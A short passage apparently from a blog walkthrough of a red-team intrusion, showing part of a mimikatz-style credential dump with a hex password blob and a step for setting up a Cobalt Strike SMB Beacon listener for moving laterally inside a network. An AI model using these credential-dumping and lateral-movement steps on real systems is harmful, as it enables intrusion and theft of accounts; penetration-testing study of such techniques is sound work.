     * Password : 88 fa 81 41 40 bb 86 82 6b 34 6e 7e 23 a5 01 48 a5 98 82 aa ce 87 33 c0 01 9b fe 9b 39 4c 1a 4d f2 eb d9 7e 3f f1 f8 42 fa 7c f3 60 6d 10 63 28 25 80 de 4d 8f e8 c5 80 a7 ac f6 99 b4 95 33 0e 96 1f a3 79 b7 0b d1 8f 3a 37 c4 ed 30 c9 cc 4b db 6c db bc 14 79 45 22 b7 73 32 74 2e 99 b8 93 22 15 2e 0d 1f f9 47 3c 81 d2 a4 66 99 b6 23 c4 6a e0 fa 87 12 64 20 bd b1 f3 e2 df c0 71 74 e2 96 d9 8f 03 ee 27 f0 0e 71 86 62 b7 50 f6 f9 eb 4c 3d 33 b0 5d f6 dd 62 7b c8 e0 da 72 f0 f3 49 50 8d e0 9b f3 c2 e9 7a 94 9c 04 e8 f3 3a 23 34 66 df 16 9c 15 fc 25 96 0b 42 65 d6 05 d7 e7 d4 9b c2 aa 02 aa 4a 4d 81 b2 7e 54 51 b1 84 9b 7f 4c 9e d3 26 a4 c7 33 29 2a 0c 4a 70 80 85 1a 1e 79 43 0f ed b8 db 88 68 e6 dd f5 e6 89 a5 a4 c9 
    ssp :   
    credman :

5. Internal network expansion

Create an SMB listener

Cobalt Strike | Listeners | Payload | Beacon SMB.


Published: 2023-04-13 22:20:00
Permalink: https://www.elefans.com/category/jswz/1b6ab29589042cca7fcee5e5e564c74a.html